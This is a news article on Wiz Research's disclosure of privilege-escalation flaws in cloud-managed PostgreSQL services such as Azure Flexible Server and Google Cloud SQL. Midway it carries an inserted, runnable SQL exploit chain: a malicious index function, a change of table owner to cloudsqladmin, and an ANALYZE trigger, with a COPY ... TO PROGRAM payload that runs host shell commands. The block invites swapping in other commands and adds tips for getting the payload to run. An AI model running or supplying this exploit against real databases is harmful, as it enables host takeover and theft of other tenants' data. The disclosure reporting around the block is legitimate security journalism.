Vulnerabilities have emerged in several PostgreSQL-as-a-service products, including products from two cloud giants, Microsoft and Google.

Security firm Wiz Research recently discovered vulnerabilities in the most widely used "PostgreSQL-as-a-Service" offerings from multiple cloud vendors. The flaws were not in PostgreSQL itself but in the modifications the cloud vendors made to it.

Earlier this year, the security firm discovered a series of critical vulnerabilities in Microsoft Azure Database for PostgreSQL Flexible Server.

The vulnerability, named #ExtraReplica, allowed an attacker, starting from their own managed instance, to read other customers' PostgreSQL databases, bypassing the cross-tenant isolation mechanisms.

Shir Tamari, director of research at Wiz, told the media: "The isolation mechanism is not perfect: we can access other customers' instances from our managed instances over the network, which opens up the attack surface for other potential vulnerabilities."

The company demonstrated that attackers could exploit this attack surface to gain full access to other customers' databases.

Vulnerabilities from decades ago

Wiz has now revealed that a similar vulnerability affects Google Cloud Platform (GCP), though the potential impact is less severe.

PostgreSQL, a project now more than 25 years old, has a permissions model that was never designed for managed services, which forced cloud providers to add code of their own.

To offer Postgres as a managed service, a provider wants to give customers something close to superuser privileges without exposing the service itself, because a real superuser can use features that are dangerous in a shared environment, such as executing programs on the database host.

PostgreSQL's privilege model has no fine-grained way to delegate only part of what a superuser can do. As a result, cloud providers modified the engine so that regular users could exercise a selected set of superuser capabilities.

These changes allowed Wiz's team to execute arbitrary commands on the underlying compute instances at multiple PostgreSQL-as-a-service vendors. In the worst case, an attacker could reach the data of other customers using the affected service.

There are multiple patches

Take Cloud SQL as an example: Wiz's team could not obtain superuser status, but the modified privilege model gave them some of its permissions. One of these was the ability to change the owner of a table to any user or role in the database, something stock PostgreSQL allows only for roles the current user is a member of.

This meant the team could create a table with dummy content, create a malicious index function on that table carrying a code execution payload, and then change the owner of the table to cloudsqladmin, GCP's superuser role, which is used only by Cloud SQL itself to maintain and manage the database.

Running ANALYZE on the table then forced the PostgreSQL engine to switch its user context to the table's owner, cloudsqladmin, and evaluate the malicious index function with cloudsqladmin's privileges, which is enough to execute shell commands on the host.
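The chain in the three paragraphs above, written out as an added SQL illustration. This is not Wiz's published proof of concept: the role name cloudsqladmin comes from the text, while the table, function and payload names and the exact payload are assumptions. The payload uses COPY ... TO PROGRAM, a superuser-only PostgreSQL feature that runs a shell command on the database host. The statements are meant to be run from a regular user's psql session against a database that user can create objects in.

```sql
-- Added illustration of the ownership-confusion chain described above;
-- not Wiz's own proof of concept. cloudsqladmin is from the article,
-- everything else (names, payload, output path) is assumed.

-- 1. A table we own, with one row so ANALYZE has something to sample.
CREATE TABLE wiz_demo (t text);
INSERT INTO wiz_demo VALUES ('seed');

-- 2. The "malicious index function". IMMUTABLE is required for use in an
--    index expression and PL/pgSQL does not verify the claim. The guard on
--    current_user lets CREATE INDEX succeed while we are still the regular
--    user (COPY ... TO PROGRAM would otherwise fail with permission denied)
--    and fires the payload only once the function runs as the table owner.
CREATE OR REPLACE FUNCTION wiz_payload(v text) RETURNS text
LANGUAGE plpgsql IMMUTABLE AS $$
BEGIN
  IF current_user = 'cloudsqladmin' THEN
    -- Assumed payload: COPY ... TO PROGRAM is superuser-only and runs a
    -- shell command on the database host. Replace the command as needed.
    EXECUTE $cmd$COPY (SELECT 1) TO PROGRAM 'id > /tmp/wiz_demo_out'$cmd$;
  END IF;
  RETURN v;
END
$$;

-- 3. Expression index over the function. The expression is evaluated now,
--    as us, so the guard is false and nothing happens yet.
CREATE INDEX wiz_demo_idx ON wiz_demo (wiz_payload(t));

-- 4. The permission the modified privilege model granted: hand the table
--    to the superuser role. On stock PostgreSQL this fails with
--    'must be member of role "cloudsqladmin"'; if it succeeds, the
--    relaxed model described in the article is in place.
ALTER TABLE wiz_demo OWNER TO cloudsqladmin;

-- 5. ANALYZE samples rows and evaluates the expression index after
--    switching to the table owner's identity, so wiz_payload now runs as
--    cloudsqladmin and the shell command executes on the host.
ANALYZE wiz_demo;
```

Two caveats for anyone reproducing this in a lab. ANALYZE on stock PostgreSQL only proceeds for the table owner, so after step 4 a plain user's manual ANALYZE may be skipped with a warning; autovacuum's automatic analyze evaluates the same index expression under the owner's identity, which is why inserting enough rows into the table has the same effect. Current PostgreSQL releases also run these maintenance operations with a restricted search_path and other safeguards, and the article reports that the vendors have patched, so the block describes the pre-fix behaviour.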

Wiz's team worked with more than a dozen PostgreSQL vendors during the research to verify and fix the issues found. It turned out that many cloud providers had made the same modification in order to adapt PostgreSQL as a managed service, and therefore faced the same security risks.

"As part of an extensive and responsible disclosure process, we communicated our findings to several of the major cloud vendors and others to help them determine whether they have any issues we identified," Tamari said.

Reference and source: https://portswigger.net/daily-swig/multiple-cloud-vendors-impacted-by-postgresql-vulnerability-that-exposed-enterprise-databases